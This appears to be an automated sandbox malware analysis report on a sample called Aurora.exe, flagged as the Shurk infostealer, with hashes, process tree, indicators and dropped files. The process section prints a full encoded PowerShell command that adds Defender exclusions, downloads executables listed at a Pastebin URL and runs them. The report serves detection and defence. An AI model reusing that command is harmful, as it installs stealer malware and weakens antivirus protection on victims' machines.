Analysis
-
max time kernel
151s -
max time network
30s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
01-05-2023 10:45
Behavioral task
behavioral1
Sample
Aurora.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
Aurora.exe
Resource
win10v2004-20230220-en
General
-
Target
Aurora.exe
-
Size
25.5MB
-
MD5
5b5049eee909a12420356f785890ee12
-
SHA1
2458920623ab942e1f564cb09ae25fb02b6b76a0
-
SHA256
4e68fa05c32bcd3790d93809a53be10bc4b0b1023dfaef3b101ef0f29a62efd0
-
SHA512
5c7fecb1d55baa008ee4fa90a08c0a1dbbcb2635082a6df51bdacf6fde9fe878f36769fd8099f5a0c371b3e60e5d4ff8e4097bf38346f7167d0a13c9bcdc310c
-
SSDEEP
98304:UlQKxQh+98myGsy1slENtrE7pQ8kq34vEStCAsDrP7J8yStyBCWLRV7VtC4bksxA:QQPY9mgGvkHEAsdtLRVRXgFqKQbEZxRF
Malware Config
Extracted
https://pastebin.com/raw/tPAFrSUD
Signatures
-
Shurk
Shurk is an infostealer, written in C++ which appeared in 2021.
-
Shurk Stealer payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/2008-60-0x0000000000400000-0x0000000001D8A000-memory.dmp shurk_stealer -
Blocklisted process makes network request 7 IoCs
Processes:
powershell.exeflow pid process 4 1200 powershell.exe 6 1200 powershell.exe 7 1200 powershell.exe 8 1200 powershell.exe 9 1200 powershell.exe 10 1200 powershell.exe 11 1200 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
LXIX.exepid process 2016 LXIX.exe -
Loads dropped DLL 1 IoCs
Processes:
Aurora.exepid process 2008 Aurora.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exetaskmgr.exepid process 1200 powershell.exe 1200 powershell.exe 1636 powershell.exe 1940 taskmgr.exe 1940 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exetaskmgr.exedescription pid process Token: SeDebugPrivilege 1200 powershell.exe Token: SeDebugPrivilege 1636 powershell.exe Token: SeDebugPrivilege 1940 taskmgr.exe -
Suspicious use of FindShellTrayWindow 14 IoCs
Processes:
taskmgr.exepid process 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe -
Suspicious use of SendNotifyMessage 14 IoCs
Processes:
taskmgr.exepid process 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe 1940 taskmgr.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
Aurora.exeLXIX.exepowershell.exedescription pid process target process PID 2008 wrote to memory of 2016 2008 Aurora.exe LXIX.exe PID 2008 wrote to memory of 2016 2008 Aurora.exe LXIX.exe PID 2008 wrote to memory of 2016 2008 Aurora.exe LXIX.exe PID 2008 wrote to memory of 2016 2008 Aurora.exe LXIX.exe PID 2016 wrote to memory of 1200 2016 LXIX.exe powershell.exe PID 2016 wrote to memory of 1200 2016 LXIX.exe powershell.exe PID 2016 wrote to memory of 1200 2016 LXIX.exe powershell.exe PID 2016 wrote to memory of 1200 2016 LXIX.exe powershell.exe PID 1200 wrote to memory of 1636 1200 powershell.exe powershell.exe PID 1200 wrote to memory of 1636 1200 powershell.exe powershell.exe PID 1200 wrote to memory of 1636 1200 powershell.exe powershell.exe PID 1200 wrote to memory of 1636 1200 powershell.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Aurora.exe"C:\Users\Admin\AppData\Local\Temp\Aurora.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\LXIX.exe"C:\Users\Admin\AppData\Local\Temp\LXIX.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAYgBnACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGwAcgBmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAG0AZgBrACMAPgA7ACIAOwA8ACMAbQBxAHgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBwAHAAYQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGYAYQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB5AGoAdAAjAD4AOwAkAHcAYwAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQA7ACQAbABuAGsAIAA9ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBwAGEAcwB0AGUAYgBpAG4ALgBjAG8AbQAvAHIAYQB3AC8AdABQAEEARgByAFMAVQBEACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAcwBzAGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB4AGoAZgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBrAHgAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAcgB0AGsAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGYAYQBuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBmAGcAZgAjAD4A"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#lrf#>[System.Windows.Forms.MessageBox]::Show('','','OK','Error')<#mfk#>;4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\LXIX.exeFilesize
73KB
MD5decf4a367597bd686ed151ee5af53fdb
SHA17e6c4789ee9456d3981997e5392b229c1c070e8c
SHA256c977dcc0c0d1e06083f2d0ae0492afa832757afc8969c12d93ff423f3647175a
SHA51249aa48d942e55dbff5f93d46af47ee788aa7c7aef4ed993c37fe8f5f9840b37d70866f9445df8883b52d73794e11b93bbfffcada6109c7b1be35fae6ef2d4c7e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\D0UGIAZYGNZO0K1S7M2S.tempFilesize
7KB
MD5bb96e3a75aa1ed7ffc238a8a99f02f02
SHA1995cb410201455bf8519498b33b0f661ae95a282
SHA256d48ba7e15a9c17bd365ea93a5a3ef9fcda8895c95c6b94854476663440dbdecc
SHA512fb817de7c8ddf0a95b98f7bdbea58430bcdcaf3cc5af07a347cf203d0bfd3cc0960ba60cc46d03f077f2c8298e411f36572d3b8ce69934c37c7c9d96343df4e9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD5bb96e3a75aa1ed7ffc238a8a99f02f02
SHA1995cb410201455bf8519498b33b0f661ae95a282
SHA256d48ba7e15a9c17bd365ea93a5a3ef9fcda8895c95c6b94854476663440dbdecc
SHA512fb817de7c8ddf0a95b98f7bdbea58430bcdcaf3cc5af07a347cf203d0bfd3cc0960ba60cc46d03f077f2c8298e411f36572d3b8ce69934c37c7c9d96343df4e9
-
\Users\Admin\AppData\Local\Temp\LXIX.exeFilesize
73KB
MD5decf4a367597bd686ed151ee5af53fdb
SHA17e6c4789ee9456d3981997e5392b229c1c070e8c
SHA256c977dcc0c0d1e06083f2d0ae0492afa832757afc8969c12d93ff423f3647175a
SHA51249aa48d942e55dbff5f93d46af47ee788aa7c7aef4ed993c37fe8f5f9840b37d70866f9445df8883b52d73794e11b93bbfffcada6109c7b1be35fae6ef2d4c7e
-
memory/1200-63-0x00000000025C0000-0x0000000002600000-memory.dmpFilesize
256KB
-
memory/1200-64-0x00000000025C0000-0x0000000002600000-memory.dmpFilesize
256KB
-
memory/1636-70-0x0000000002720000-0x0000000002760000-memory.dmpFilesize
256KB
-
memory/1636-71-0x0000000002720000-0x0000000002760000-memory.dmpFilesize
256KB
-
memory/1940-72-0x0000000140000000-0x00000001405E8000-memory.dmpFilesize
5.9MB
-
memory/1940-73-0x0000000140000000-0x00000001405E8000-memory.dmpFilesize
5.9MB
-
memory/2008-60-0x0000000000400000-0x0000000001D8A000-memory.dmpFilesize
25.5MB